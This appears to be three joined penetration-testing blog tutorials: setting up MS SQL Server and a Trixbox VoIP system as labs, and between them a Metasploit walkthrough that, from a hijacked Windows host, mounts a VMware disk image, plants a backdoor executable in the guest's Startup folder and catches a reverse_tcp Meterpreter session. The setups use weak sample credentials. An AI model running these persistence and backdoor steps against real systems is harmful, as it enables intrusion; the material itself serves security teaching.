MS-Sql Penetration Testing lab Setup

Hello friends!! Today you will learn how to install and configure MS SQL server in windows 10 operating system.

Requirement:

1.       Download setup file ENU\x64\SQLEXPR_x64_ENU.exe

2.       Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here

3.       Download heidisql tool

Configure SQL express setup

Open the 1st download file for SQL server installation and run as administration. Click on installation then go with New SQL server standalone installation.

To install sql server2012 follow given below three steps:

·         License terms

·         Product updates

·         Install setup files

Here enable the check box for “I accept the license terms” and click on next.

Enable the check box for “Include SQL server product updates” to enhance the SQL server security and performance. It found 26 MB setup online which will get install when you will click on next.

Now it will start installing SQL server setup file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.

Feature Selection

Now select the features you want to install from given image you can see I had enable check box for following features.

·         Database Engine service

·         SQL Server Replication

·         SQL Client Connective SDK

Click on next.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of installation path.

·         Enter SQLExpress in text filed for Name Instance

·         Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of installation path.

·         Enter SQLExpress in text filed for Name Instance

·         Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Your SQL server 2012 installation completed successfully, here you can check the status for installed features.

Now open the SQL server configuration manger where you will see left and right panel.

Click on protocol for SQLExpress in left panel and then after select protocol name “TCP/IP” in right panel.

Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.

Configure SQL Management Studio setup

Now open 2nd downloaded application for SQL server management setup and add new feature in it.

No updates for SQL server 2012 click on next.

Installation type

Since we have already created instance “SQLExpress” now we can add featured in SQLExpress instance of SQL server 2012.

From given below image you can observe the table for installed instance. Click on next

Feature selection

For installation of instance feature enable the check box for Management tool basic as shared featured then click on next and next.

Management tool basic installation completed successfully, here you can check the status for installed features. Click on installation then go with New SQL server standalone installation.

Now login into SQL Server using admin credential and click on connect.

Once you are login into SQL server then Explore security folder and create a new login account for other users.

Enter the user name as I had given “ignite” and set password by choosing sql server authentication for this user.

From given image you can observe that master is default database.

Connect to server

Run heidisql tool to connect with MS SQL Server through Ignite user as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQLserver, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers and scheduled events.

Now click on open

Grate!! We have successfully access the database system of MSSQL server. You can modify or create new table or new database and much more things.

Post Exploitation in VMDK with Meterprter

Hello friends!! Today you will how to exploit any operation system running inside the virtual machine.

Requrement

Attacker: kali linux

Target: VM image windows server 2012

First attacker needs to exploit actual operating system of victim PC and attain the meterpreter session with admin privileges.

From given image you can perceive I have seize windows 10 meterpreter session and also gained admin privileges. 

Meterpreter > sysinfo

When you install any operating system in your vmware workstation then all its hardware and network setting get store as .vmx file in actual operating system in order to create new virtual image.

Type following for making search of .vmx file stored in it

Meterpreter > search –f *.vmx –r

From given image you can perceive that it has dump the all location where .vmx files are stored.

Using cat command you can read the content of file as these file simple text document which contain vm setting information.

We had opened windows server 2012 vm image through cat command.

Meterpreter > cat “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

Here from given below image you can read the details of this file which is describing network and hardware setting.

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

msf post(vmdk_mount) > run

Great!! We have successfully mount vmdk file of windows server2012.

meterpreter > show_mount

Now from given below image you can read the information of each drives.

Now using given below command I will upload an exe backdoor in L: drive which will give us reverse connection of windows server 2012 when it will be running inside vm workstation.

Meterpreter > upload /root/Desktop/abc.exe “L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”

use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.1.113

msf exploit(handler) >set lport 445

msf exploit(handler) >run

Awesome!! We have successfully exploited windows server2012 virtual machine and gained its meterpreter session.

Meterpreter >sysinfo

Lab Setup for VOIP Penetration Testing

Hello friends! Today you will learn how to setup VOIP in virtual machine using tribox 2.8.0.4 iso image for making phone calls and sending text messages in local network.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open vmware, select option “creates new virtual machine”, now for install from wizard select third option:

I will install operating system later

Then click on next.

Now select 2^nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Click on CD/DVD to browse ISO file “tribox 2.8.0.4”.

Select bridges connection and enable the check box for replicate connection for network adapter setting.

Then click on finish.

Trixbox is the world's most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

It will start rebooting the vm automatically, now for TRIBOX CE installation follow given below steps:

A dialog box will appear for selecting option keyboard type, here chose option “US” as given in below image. Then click on OK tab.

Another dialog fox will ask to choose time zone, select Asia/ Kolkata. Then click on OK tab.

Now enter the password you want to give for root user. I had given tribox as password. Again type confirm password and then click on OK tab.

Now it will start installation process automatically which will take some time as shown in given below image. Do not disturb installation until it becomes 100 % completely.

Once installation will complete it will ask for login. Type username: root and password: tribox

Check network interface using “ifconfig” command, now from here I came to know my vm IP: 192.168.1.128.

Now open this IP: 192.168.1.218 in web browser. Here through Tribox GUI we are going to create some users account by assigning them extension number. For example you received 8 digit numbers for your land-line from service providers.

By default tribox GUI open with user mode and for creating extension number we need to switch into admin mode.

Click on switch option for user mode given on top of right corner.

The authentication is required for login into admin mode of tribox.

Now enter username: maint and password: password as admin credential.

You will get a pop up message for tribox registration, close this message.

At tribox platform you will see server status, now click on PBX option and select PBX setting option from given menu.

Under setup list of admin select extensions option as basic setup.

Select device

Now follow given below steps for creating an extension inside the server:

Device: generic SIP device

Click on submit

Add extension

User extension: 1234567 (any 7 digit number)

Display name: ignite (name of user/ customer you want assign this number)

Device options

Secret: 123

Dtmfmode: rfc2833

Once you have enter the information for creating a new extension click on submit.

Similarly create one more extension so then we can check communication between both extensions.

From given image you can see now we had configured two extension 1^st for ignite [1234567] and 2^nd for raj[12345678].

We had created two extensions one as caller and other as receiver. You can create multiple extension as per your requirement.

Now click on orange color tile for apply configuration changes to put them into effect.

A pop will open here select continue with reload

Now this is all about server installation and configuration of extension inside it.

Now download ZOIPER application in your system

Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded it will look like as given below image, now go with setting option for configuration of an account which will be able to make call or receive call from another user.

Select account type SIP and click on next.

If you remember in tribox GUI we had add an extension 1234567 for ignite now enter those information in account wizard in order to save it as new contact.

Now enter user number with server IP as given below

1234567@192.168.1218

Enter password for this account of your own choice.

Click on next.

It will auto detect the account name as shown in given image. Then click on next.

Your one account has been created in accounted list. Now ignite will be able to make calls or receive calls from another users.

We have already created ignite account in system through zoiper for making and receiving calls. Now we need to install zoiper on other device for other users also, who will be able to make or receive call from ignite.

Download zoiper from Google play stores in your android phone.  Run the application after installation.

Click on config icon for configuration of a new account in your phone as shown in given image and select Accounts option from given list of configuration.  

Then a new window will open click on add account. A dialog box will appear for account setup click on YES.

Now again a new dialog box will pop up select manual configuration for account setup.

Go for SIP as account type you have chose.

Now enter following information for SIP account setting:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now click on save.

You can see from given image that account for raj is ready.

Hence we have setup two accounts in zoiper one will act as caller let say raj is caller making call to ignite through his phone and ignite will be receiver and get incoming call on system from raj.

As you know we had configured two extension one for ignite another for raj. Now we are going to test this VOIP setup by making call from raj.

Raj had made call to ignite by dialing his number 1234567 and when you will perform this you will hear the outgoing bell from your phone.

Ignite will get incoming call on system as shown in given image. Click on answer for accepting call from raj.

From given screenshot you can see that the call is connected and raj and ignite is having conversation over VOIP call.

Great!!! Hence in this way you can configure your VOIP server for local network and can communicate with multiple users by making calls or chat.